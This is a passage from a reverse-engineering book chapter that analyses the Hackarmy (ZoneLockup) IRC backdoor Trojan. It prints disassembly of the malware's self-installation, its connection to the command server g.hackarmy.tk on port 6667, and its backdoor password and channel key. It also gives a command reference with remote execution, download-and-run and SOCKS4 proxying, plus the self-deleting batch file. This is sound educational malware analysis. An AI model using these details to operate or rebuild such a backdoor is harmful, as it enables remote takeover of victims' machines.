00402710  ADD ESP,0C
00402713  PUSH 5                       ; IsShown = 5
00402715  PUSH 0                       ; DefDir = NULL
00402717  LEA EAX,DWORD PTR SS:[EBP-29C]
0040271D  PUSH EAX                     ; Parameters
0040271E  PUSH ZoneLock.00404010       ; FileName = "C:\WINNT\system32"
00402723  PUSH ZoneLock.00405696       ; Operation = "open"
00402728  PUSH 0                       ; hWnd = NULL
0040272A  CALL <JMP.&SHELL32.ShellExecuteA>
0040272F  PUSH 0                       ; ExitCode = 0
00402731  CALL <JMP.&KERNEL32.ExitProcess>
00402736  CALL <JMP.&KERNEL32.GetCommandLineA>
0040273B  PUSH ZoneLock.00405538       ; s2 = "qwer"
00402740  PUSH EAX                     ; s1
00402741  CALL <JMP.&CRTDLL.strstr>
00402746  ADD ESP,8
00402749  MOV ESI,EAX
0040274B  OR ESI,ESI
0040274D  JE SHORT ZoneLock.00402775
0040274F  MOV ECX,ESI
00402751  OR EAX,FFFFFFFF
00402754  INC EAX
00402755  CMP BYTE PTR DS:[ECX+EAX],0
00402759  JNZ SHORT ZoneLock.00402754
0040275B  CMP EAX,8
0040275E  JBE SHORT ZoneLock.00402775
00402760  PUSH 7D0                     ; Timeout = 2000. ms
00402765  CALL <JMP.&KERNEL32.Sleep>
0040276A  MOV EAX,ESI
0040276C  ADD EAX,4
0040276F  PUSH EAX                     ; FileName
00402770  CALL <JMP.&KERNEL32.DeleteFileA>
00402775  PUSH ZoneLock.004050A3       ; MutexName = "botsmfdutpex"
0040277A  PUSH 1                       ; InitialOwner = TRUE
0040277C  PUSH 0                       ; pSecurity = NULL
0040277E  CALL <JMP.&KERNEL32.CreateMutexA>
00402783  MOV DWORD PTR DS:[404650],EAX
00402788  CALL <JMP.&KERNEL32.GetLastError>
0040278D  CMP EAX,0B7
00402792  JNZ SHORT ZoneLock.0040279B
00402794  PUSH 0                       ; ExitCode = 0
00402796  CALL <JMP.&KERNEL32.ExitProcess>

When the program is first launched, it runs some checks to see whether it has already been installed, and if not it installs itself. This is done by calling GetModuleFileName to obtain the primary executable's file name, and checking whether the system's SYSTEM32 directory name is part of the path. If the program has not yet been installed, it proceeds to copy itself to the SYSTEM32 directory under the name ZoneLockup.exe, launches that executable, and terminates itself by calling ExitProcess.

The new instance of the process is obviously going to run this exact same code, except this time the SYSTEM32 check will find that the program is already running from SYSTEM32 and will wind up running the code at 00402736. This sequence checks whether this is the first time that the program is launched from its permanent habitat. This is done by checking a special flag qwer set in the command-line parameters that also includes the full path and name of the original Trojan executable that was launched (This is going to be something like Webcam Shots.scr). The program needs this information so that it can delete this file—there is no reason to keep the original executable in place after the ZoneLockup.exe is created and launched.

If you're wondering why this file name was passed into the new instance instead of just deleting it in the previous instance, there is a simple answer: It wouldn't have been possible to delete the executable while the program was still running, because Windows locks executable files while they are loaded into memory. The program had to launch a new instance, terminate the first one, and delete the original file from this new instance.

The function proceeds to create a mutex called botsmfdutpex, whatever that means. The purpose of this mutex is to make sure no other instances of the program are already running; the program terminates if the mutex already exists. This mechanism ensures that the program doesn't try to infect the same host twice.

Initializing Communications

The next part of this function is a bit too long to print here, but it's easily readable: It collects several bits of information regarding the host, including the exact version of the operating system, and the currently logged-on user. This is followed by what is essentially the program's main loop, which is printed in Listing 8.4.

Example 8.4. The Backdoor program's primary network connection check loop.

00402939  /PUSH
00040293B  |LEA EAX,DWORD PTR SS:[EBP-4]
0040293E  |PUSH EAX
0040293F  |CALL <JMP.&WININET.InternetGetConnectedState>
00402944  |OR EAX,EAX

00402946  |JNZ SHORT ZoneLock.00402954
00402948  |PUSH 7530                   ; Timeout = 30000. ms
0040294D  |CALL <JMP.&KERNEL32.Sleep>
00402952  |JMP SHORT ZoneLock.0040299A
00402954  |CMP DWORD PTR DS:[EDI*4+405104],0
0040295C  |JNZ SHORT ZoneLock.00402960
0040295E  |XOR EDI,EDI
00402960  |PUSH DWORD PTR DS:[EDI*4+40510C]
00402967  |PUSH DWORD PTR DS:[EDI*4+405104]
0040296E  |CALL ZoneLock.004029B1
00402973  |ADD ESP,8
00402976  |MOV ESI,EAX
00402978  |CMP ESI,1
0040297B  |JNZ SHORT ZoneLock.0040298A
0040297D  |PUSH DWORD PTR DS:[40464C]  ; Timeout = 0. ms
00402983  |CALL <JMP.&KERNEL32.Sleep>
00402988  |JMP SHORT ZoneLock.00402990
0040298A  |CMP ESI,3
0040298D  |JE SHORT ZoneLock.0040299C
0040298F  |INC EDI
00402990  |PUSH 1388                   ; /Timeout = 5000. ms
00402995  |CALL <JMP.&KERNEL32.Sleep>
0040299A  \JMP SHORT ZoneLock.00402939

The first thing you'll notice about the this code sequence is that it is a loop, probably coded as an infinite loop (such as a while(1) statement). In its first phase, the loop repeatedly calls the InternetGetConnectedState API and sleeps for 30 seconds if the API returns FALSE. As you've probably guessed, the InternetGetConnectedState API checks whether the computer is currently connected to the Internet. In reality, this API only checks whether the system has a valid IP address—it doesn't really check that it is connected to the Internet. It looks as if the program is checking for a network connection and is simply waiting for the system to become connected if it's not already connected.

Once the connection check succeeds, the function calls another function, 004029B1, with the first parameter being a pointer to the hard-coded string g.hackarmy.tk, and with the second parameter being 0x1A0B (6667 in decimal). This function immediately calls into a function at 0040129C, which calls the gethostbyname WinSock2 function on that g.hackarmy.tk string, and proceeds to call the connect function to connect to that address. The port number is set to the value from the second parameter passed earlier: 6667. In case you're not sure what this port number is used for, a quick trip to the IANA Web site (the Internet Assigned Numbers Authority) at www.iana.org shows that ports 6665 through 6669 are registered for IRCU, the Internet Relay Chat services.

It looks like the Trojan is looking to chat with someone. Care to guess with whom? Here's a hint: he's wearing a black hat. Well, at least in security book illustrations he does, it's actually more likely that he's just a bored teenager wearing a baseball cap. Regardless, the program is clearly trying to connect to an IRC server in order to communicate with an attacker who is most likely its original author. The specific address being referenced is g.hackarmy.tk, which was invalid at the time of writing (and is most likely going to remain invalid). This address was probably unregistered very early on, as soon as the antivirus companies discovered that it was being used for backdoor access to infected machines. You can safely assume that this address originally pointed to some IRC server, either one set up specifically for this purpose or one of the many legitimate public servers.

Connecting to the Server

To really test the Trojan's backdoor capabilities, I set up an IRC server on a separate virtual machine and named it g.hackarmy.tk, so that the Trojan connects to it when it is launched. You're welcome to try this out if you want, but you're probably going to learn plenty by just reading through my accounts of this experience. To make this reversing session truly effective, I was combining a conventional reversing session with some live chats with the backdoor through IRC.

Stepping through the code that follows the connection of the socket, you can see a function that seems somewhat interesting and unusual, shown in Listing 8.5.

Example 8.5. A random string-generation function.

004014EC  PUSH EBP
004014ED  MOV EBP,ESP
004014EF  PUSH EBX
004014F0  PUSH ESI
004014F1  PUSH EDI
004014F2  CALL <JMP.&KERNEL32.GetTickCount>
004014F7  PUSH EAX                     ; seed
004014F8  CALL <JMP.&CRTDLL.srand>
004014FD  POP ECX
004014FE  CALL <JMP.&CRTDLL.rand>
00401503  MOV EDX,EAX
00401505  AND EDX,80000003
0040150B  JGE SHORT ZoneLock.00401512
0040150D  DEC EDX
0040150E  OR EDX,FFFFFFFC
00401511  INC EDX
00401512  MOV EBX,EDX
00401514  ADD EBX,4
00401517  MOV ESI,0

0040151C  JMP SHORT ZoneLock.00401535
0040151E  CALL <JMP.&CRTDLL.rand>
00401523  MOV EDI,DWORD PTR SS:[EBP+8]
00401526  MOV ECX,1A
0040152B  CDQ
0040152C  IDIV ECX
0040152E  ADD EDX,61
00401531  MOV BYTE PTR DS:[EDI+ESI],DL
00401534  INC ESI
00401535  CMP ESI,EBX
00401537  JLE SHORT ZoneLock.0040151E
00401539  MOV EAX,DWORD PTR SS:[EBP+8]
0040153C  MOV BYTE PTR DS:[EAX+ESI],0
00401540  POP EDI
00401541  POP ESI
00401542  POP EBX
00401543  POP EBP
00401544  RETN

This generates some kind of random data (with the random seed taken from the current tick counter). The buffer length is somewhat random; the default length is 5 bytes, but it can go to anywhere from 2 to 8 bytes, depending on whether rand produces a negative or positive integer. Once the primary loop is entered, the function computes a random number for each byte, calculates a modulo 0x1A (26 in decimal) for each random number, adds 0x61 (97 in decimal), and stores the result in the current byte in the buffer.

Observing the resulting buffer in OllyDbg exposes that the program is essentially producing a short random string that is made up of lowercase letters, and that the string is placed inside the caller-supplied buffer.

Note

Notice how the modulo in Listing 8.5 is computed using the highly ineffiecient IDIV instruction. This indicates that the Trojan was compiled with some kind of Minimize Size compiler option (assuming that it was written in a high-level language). If the compiler was aiming at generating high-performance code, it would have used reciprocal multiplication to compute the modulo, which would have produced far longer, yet faster code. This is not surprising considering that the program originally came packed with UPX—the author of this program was clearly aiming at making the executable as tiny as possible. For more information on how to identify optimized division sequences and other common arithmetic operations, refer to Appendix B.

The next sequence takes the random string and produces a string that is later sent to the IRC server. Let's take a look at that code.

00402ABB  PUSH EAX                     ; <%s>
00402ABC  PUSH ZoneLock.0040519E       ; <%s> = "USER"
00402AC1  LEA EAX,DWORD PTR SS:[EBP-204]
00402AC7  PUSH EAX                     ; <%s>
00402AC8  PUSH ZoneLock.00405199       ; <%s> = "NICK"
00402ACD  PUSH ZoneLock.004054C5       ; format = "%s %s %s %s "x.com" "x" :x"
00402AD2  LEA EAX,DWORD PTR SS:[EBP-508]
00402AD8  PUSH EAX                     ; s
00402AD9  CALL <JMP.&CRTDLL.sprintf>

Considering that EAX contains the address of the randomly generated string, you should now know exactly what that string is for: it is the user name the backdoor will be using when connecting to the server.

The preceding sequence produced the following message, and will always produce the same message—the only difference is going to be the randomly generated name string.

NICK vsorpy USER vsorpy "x.com" "x" :x

If you look at RFC 1459, the IRC protocol specifications, you can see that this string means that a new user called vsorpy is being registered with the server. This username is going to represent this particular system in the IRC chat. The random-naming scheme was probably created in order to enable multiple clients to connect to the same server without conflicts. The architecture actually supports convenient communication with multiple infected systems at the same time.

Joining the Channel

After connecting to the IRC server, the program and the IRC server enter into a brief round of standard IRC protocol communications that is just typical protocol handshaking. The next important even takes place when the IRC server notifies the client whether or not the server has a MOTD (Message of the Day) set up. Based on this information, the program enters into the code sequence that follows, which decides how to enter into the communications channels inside which the attacker will be communicating with the Backdoor.

00402D80  JBE SHORT ZoneLock.00402DA7
00402D82  PUSH ZoneLock.004050B6       ; <%s> = "grandad"
00402D87  PUSH ZoneLock.004050B0       ; <%s> = "##g##"
00402D8C  PUSH ZoneLock.004051A3       ; <%s> = "JOIN"
00402D91  PUSH ZoneLock.004054AC       ; format = "%s %s %s"

00402D96  LEA EAX,DWORD PTR SS:[EBP-260]
00402D9C  PUSH EAX                     ; s
00402D9D  CALL <JMP.&CRTDLL.sprintf>
00402DA2  ADD ESP,14
00402DA5  JMP SHORT ZoneLock.00402DC5
00402DA7  PUSH ZoneLock.004050B0       ; <%s> = "##g##"
00402DAC  PUSH ZoneLock.004051A3       ; <%s> = "JOIN"
00402DB1  PUSH ZoneLock.004054BE       ; format = "%s %s"
00402DB6  LEA EAX,DWORD PTR SS:[EBP-260]
00402DBC  PUSH EAX                     ; s
00402DBD  CALL <JMP.&CRTDLL.sprintf>

In the preceding sequence, the first sprintf will only be called if the server sends an MOTD, and the second one will be called if it doesn't. The two commands both join the same channel: ##g##, but if the server has an MOTD the channel will be joined with the password grandad. At this point, you can start your initial communications with the program by pretending to be the attacker and joining into a channel called ##g## on the private IRC server. As soon as you join, you will know that your friend is already there because other than your own nickname you can also see an additional random-sounding name that's connected to this channel. That's the Backdoor program.

It's obvious that the backdoor can be controlled by issuing commands inside of this private channel that you've established, but how can you know which commands are supported? If the information you've gathered so far could have been gathered using a simple network monitor, the list of supported commands couldn't have been. For this, you simply must look at the command-processing code and determine which commands our program supports.

Communicating with the Backdoor

In communicating with the backdoor, the most important code area is the one that processes private-message packets, because that's how the attacker controls the program: through private message. It is quite easy to locate the code in the program that checks for a case where the PRIVMSG command is sent from the server. This will be helpful because you're expecting the code that follows this check to contain the actual parsing of commands from the attacker. The code that follows contains the only direct reference in the program to the PRIVMSG string.

00402E82  PUSH DWORD PTR SS:[EBP-C]                ; s2
00402E85  PUSH ZoneLock.0040518A                   ; s1 = "PRIVMSG"
00402E8A  CALL <JMP.&CRTDLL.strcmp>                ; strcmp
00402E8F  ADD ESP,8
00402E92  OR EAX,EAX
00402E94  JNZ ZoneLock.00402F8F
00402E9A  PUSH ZoneLock.004054A7                   ; s2 = " :"

00402E9F  MOV EAX,DWORD PTR SS:[EBP+8]             ;
00402EA2  INC EAX                                  ;
00402EA3  PUSH EAX                                 ; s1
00402EA4  CALL <JMP.&CRTDLL.strstr>                ; strstr
00402EA9  ADD ESP,8
00402EAC  MOV EDX,EAX
00402EAE  ADD EDX,2
00402EB1  MOV ESI,EDX
00402EB3  JNZ SHORT ZoneLock.00402EBC
00402EB5  XOR EAX,EAX
00402EB7  JMP ZoneLock.00403011
00402EBC  MOVSX EAX,BYTE PTR DS:[ESI]
00402EBF  MOVSX EDX,BYTE PTR DS:[4050C5]
00402EC6  CMP EAX,EDX
00402EC8  JE SHORT ZoneLock.00402ED1
00402ECA  XOR EAX,EAX

After confirming that the command string is actually PRIVMSG, the program skips the colon character that denotes the beginning of the message (in the strstr call), and proceeds to compare the first character of the actual message with a character from 004050C5. When you look at that memory address in the debugger, you can see that it appears to contain a hard-coded exclamation mark (!) character. If the first character is not an exclamation mark, the program exits the function and goes back to wait for the next server transmission. So, it looks as if backdoor commands start with an exclamation mark. The next code sequence appears to perform another kind of check on your private messages. Let's take a look.

00402EED  XOR EDI,EDI
00402EEF  LEA EAX,DWORD PTR SS:[EBP-60]
00402EF2  PUSH EAX                                ; s2
00402EF3  IMUL EAX,EDI,50                         ;
00402EF6  LEA EAX,DWORD PTR DS:[EAX+4051C5]       ;
00402EFD  PUSH EAX                                ; s1
00402EFE  CALL <JMP.&CRTDLL.strcmp>               ; strcmp
00402F03  ADD ESP,8
00402F06  OR EAX,EAX
00402F08  JNZ SHORT ZoneLock.00402F0D
00402F0A  XOR EBX,EBX
00402F0C  INC EBX
00402F0D  INC EDI
00402F0E  CMP EDI,3
00402F11  JLE SHORT ZoneLock.00402EEF

The preceding sequence is important: It compares a string from [EBP-60], which is the nickname of the user who's sending the current private message (essentially the attacker) with a string from a global variable. It also looks as if this is an array of strings, each element being up to 0x50 (80 in decimal) characters long. While I was first stepping through this sequence, all of these four strings were empty. This made the code proceed to the code sequence that follows instead of calling into a longish function at 00403016 that would have been called if there was a match on one of the usernames. Let's look at what the function does next (when the usernames don't match).

00402F29  PUSH ZoneLock.004050BE       ; <%s> = "tounge"
00402F2E  PUSH ZoneLock.00405110       ; <%s> = "morris"
00402F33  PUSH ZoneLock.004054A1       ; format = "%s %s"
00402F38  LEA EAX,DWORD PTR SS:[EBP-260]
00402F3E  PUSH EAX                     ; s
00402F3F  CALL <JMP.&CRTDLL.sprintf>
00402F44  LEA EAX,DWORD PTR SS:[EBP-260]
00402F4A  PUSH EAX                     ; s2
00402F4B  PUSH ESI                     ; s1
00402F4C  CALL <JMP.&CRTDLL.strcmp>

This is an interesting sequence. The first part uses sprintf to produce the string morris tounge, which is then checked against the current message being processed. If there is a mismatch, the function performs one more check on the current command string (even though it's been confirmed to be PRIVMSG), and returns. If the current command is" !morris tounge", the program stores the originating username in the currently available slot on that string array from 004051C5. That is, upon receiving this Morris message, the program is storing the name of the user it's currently talking to in an array. This is the array that starts at 004051C5; the same array that was scanned for the attacker's name earlier. What does this tell you? It looks like the string !morris tounge is the secret password for the Backdoor program. It will only start processing commands from a user that has transmitted this particular message!

One unusual thing about the preceding code snippet that generates and checks whether this is the correct password is that the sprintf call seems to be redundant. Why not just call strcmp with a pointer to the full morris tounge string? Why construct it in runtime if it's a predefined, hard-coded string? A quick search for other references to this address shows that it is static; there doesn't seem to be any other place in the code that modifies this sequence in any way. Therefore, the only reason I can think of is that the author of this program didn't want the string "morris tounge" to actually appear in the program in one piece. If you look at the code snippet, you'll see that each of the words come from a different area in the program's data section. This is essentially a primitive antireversing scheme that's supposed to make it a bit more difficult to find the password string when searching through the program binary.

Now that we have the password, you can type it into our IRC program and try to establish a real communications channel with the backdoor. Obtaining a basic list of supported commands is going to be quite easy. I've already mentioned a routine at 00403016 that appears to process the supported commands. Disassembling this function to figure out the supported commands is an almost trivial task; one merely has to look for calls to string-comparison functions and examine the strings being compared. The function that does this is far too long to be included here, but let's take a look at a typical sequence that checks the incoming message.

0040308B  PUSH ZoneLock.0040511B       ; s2 = "?dontuseme"
00403090  LEA EAX,DWORD PTR SS:[EBP-200]
00403096  PUSH EAX                     ; s1
00403097  CALL <JMP.&CRTDLL.strcmp>
0040309C  ADD ESP,8
0040309F  OR EAX,EAX
004030A1  JNZ SHORT ZoneLock.004030B2
004030A3  CALL ZoneLock.00401AA0
004030A8  MOV EAX,3
004030AD  JMP ZoneLock.00403640
004030B2  PUSH ZoneLock.00405126       ; s2 = "?quit"
004030B7  LEA EAX,DWORD PTR SS:[EBP-200]
004030BD  PUSH EAX                     ; s1
004030BE  CALL <JMP.&CRTDLL.strcmp>
004030C3  ADD ESP,8
004030C6  OR EAX,EAX
004030C8  JNZ SHORT ZoneLock.004030D4
004030CA  MOV EAX,3
004030CF  JMP ZoneLock.00403640
004030D4  PUSH ZoneLock.00405138       ; s2 = "threads"
004030D9  LEA EAX,DWORD PTR SS:[EBP-200]
004030DF  PUSH EAX                     ; s1
004030E0  CALL <JMP.&CRTDLL.strcmp>

See my point? All three strings are compared against the string from [EBP-200]; that's the command string (not including the exclamation mark). There are quite a few string comparisons, and I won't go over the code that responds to each and every one of them. Instead, how about we try out a few of the more obvious ones and just see what happens? For instance, let's start with the !info command.

/JOIN ##g##
<attacker> !morris tounge
<attacker> !info
-iyljuhn- Windows 2000 [Service Pack 4]. uptime: 0d 18h 11m.
  cpu 1648MHz. online: 0d 0h 0m. Current user: eldade.
  IP:192.168.11.128 Hostname:eldad-vm-2ksrv. Processor x86
  Family 6 Model 9 Stepping 8, GenuineIntel.

You start out by joining the ##g## channel and saying the password. You then send the" !info" command, to which the program responds with some general information regarding the infected host. This includes the exact version of the running operating system (in my case, this was the version of the guest operating system running under VMWare, on which I installed the Trojan/backdoor), and other details such as estimated CPU speed and model number, IP address and system name, and so on.

There are plenty of other, far more interesting commands. For example, take a look at the" !webfind64" and the" !execute "commands. These two commands essentially give an attacker full control of the infected system." !execute" launches an executable from the infected host's local drives." !webfind64" downloads a file from any remote server into a local directory and launches it if needed. These two commands essentially give an attacker full-blown access to the infected system, and can be used to take advantage of the infected system in a countless number of ways.

Running SOCKS4 Servers

There is one other significant command in the backdoor program that I haven't discussed yet:" !socks4". This command establishes a thread that waits for connections that use the SOCKS4 protocol. SOCKS4 is a well-known proxy communications protocol that can be used for indirectly accessing a network. Using SOCKS4, it is possible to route all traffic (for example, outgoing Internet traffic) through a single server.

The backdoor supports multiple SOCKS4 threads that listen to any traffic on attacker-supplied port numbers. What does this all mean? It means that if the infected system has any open ports on the Internet, it is possible to install a SOCKS4 server on one of those ports, and use that system to indirectly connect to the Internet. For attackers this can be heaven, because it allows them to anonymously connect to servers on the Internet (actually, it's not anonymous—it uses the legitimate system owner's identity, so it is essentially a type of identity theft). Such anonymous connections can be used for any purpose: Web browsing, e-mail, and so on. The ability to connect to other servers anonymously without exposing one's true identity creates endless criminal opportunities—it is going to be extremely difficult to trace back the actual system from which the traffic is originating. This is especially true if each individual proxy is only used for a brief period of time and if each proxy is cleaned up properly once it is decommissioned.

Clearing the Crime Scene

Speaking of cleaning up, this program supports a self-destruct command called" !?dontuseme", which uninstalls the program from the registry and deletes the executable. You can probably guess that this is not an entirely trivial task—an executable program file cannot be deleted while the program is running. In order to work around this problem, the program must generate a "self-destruct" batch file, which deletes the program's executable after the main program exits. This is done in a little function at 00401AA0, which generates the following batch file, called "rm.bat". The program runs this batch file and quits. Let's take a quick look at this batch file.

@echo off
:start
if not exist "C:\WINNT\SYSTEM32\ZoneLockup.exe" goto done
del "C:\WINNT\SYSTEM32\ZoneLockup.exe"
goto start
:done
del rm.bat

This batch file loops through code that attempts to delete the main program executable. The loop is only terminated once the executable is actually gone. That's because the batch file is going to start running while the ZoneLockup.exe executable is still running. The batch file must wait until ZoneLockup.exe is no longer running so that it can be deleted.

The Hackarmy Backdoor: A Command Reference

Having gathered all of this information, I realized that it would be a waste to not properly summarize it. This is an interesting program that reveals much about how modern-day malware works. The following table provides a listing of the supported commands I was able to find in the program along with their descriptions.

Table 8.1. List of supported commands in the Hackarmy Trojan/Backdoor program.

COMMAND	DESCRIPTION	ARGUMENTS
`!?dontuseme`	Instructs the program to self-destruct by removing its `Autorun` registry entry and deleting its executable.
`!socks4`	Initializes a SOCKS4 server thread on the specified port. This essentially turns the infected system into a proxy server.	Port number to open.
`!threads`	Lists the currently active server threads.
`!info`	Displays some generic information regarding the infected host, including its name, IP address, CPU model and speed, currently logged on username, and so on.
`!?quit`	Closes the backdoor process without uninstalling the program. It will be started again the next time the system boots.
`!?disconnect`	Causes the program to disconnect from the IRC server and wait for the specified number of minutes before attempting to reconnect.	Number of minutes to wait before attempting reconnection.
`!execute`	Executes a local binary. The program is launched in a hidden mode to keep the end user out of the loop...	Full path to executable file.
`!delete`	Deletes a file from the infected host. The program responds with a message notifying the attacker whether or not the operation was successful.	Full path to file being deleted.
`!webfind64`	Instructs the infected host to download a file from a remote server (using a specified protocol such as `http://,ftp://`, and so on).	URL of file being downloaded and local file name that will receive the downloaded file.
`!killprocess !listprocesses`	The strings for these two commands appear in the executable, and there is a function (at `0040239A`) that appears to implement both commands, but it is unreachable. A future feature perhaps?

Conclusion

Malicious programs can be treacherous and complicated. They will do their best to be invisible and seem as innocent as possible. Educating end users on how these programs work and what to watch out for is critical, but it's not enough. Developers of applications and operating systems must constantly improve the way these programs handle untrusted code and convincingly convey to the users the fact that they simply shouldn't let an unknown program run on their system unless there's an excellent reason to do so.

In this chapter, you have learned a bit about malicious programs, how they work, and how they hide themselves from antivirus scanners. You also dissected a very typical real-world malicious program and analyzed its behavior, to gain a general idea of how these programs operate and what type of damage they inflict on infected systems.

Granted, most people wouldn't ever need to actually reverse engineer a malicious program. The developers of antivirus and other security software do an excellent job, and all that is necessary is to install the right security products and properly configure systems and networks for maximum security. Still, reversing malware can be seen as an excellent exercise in reverse engineering and as a solid introduction to malicious software.

Previous Chapter

7. Auditing Program Binaries

Next Chapter

III. Cracking

Table of Contents for Reversing: Secrets of Reverse Engineering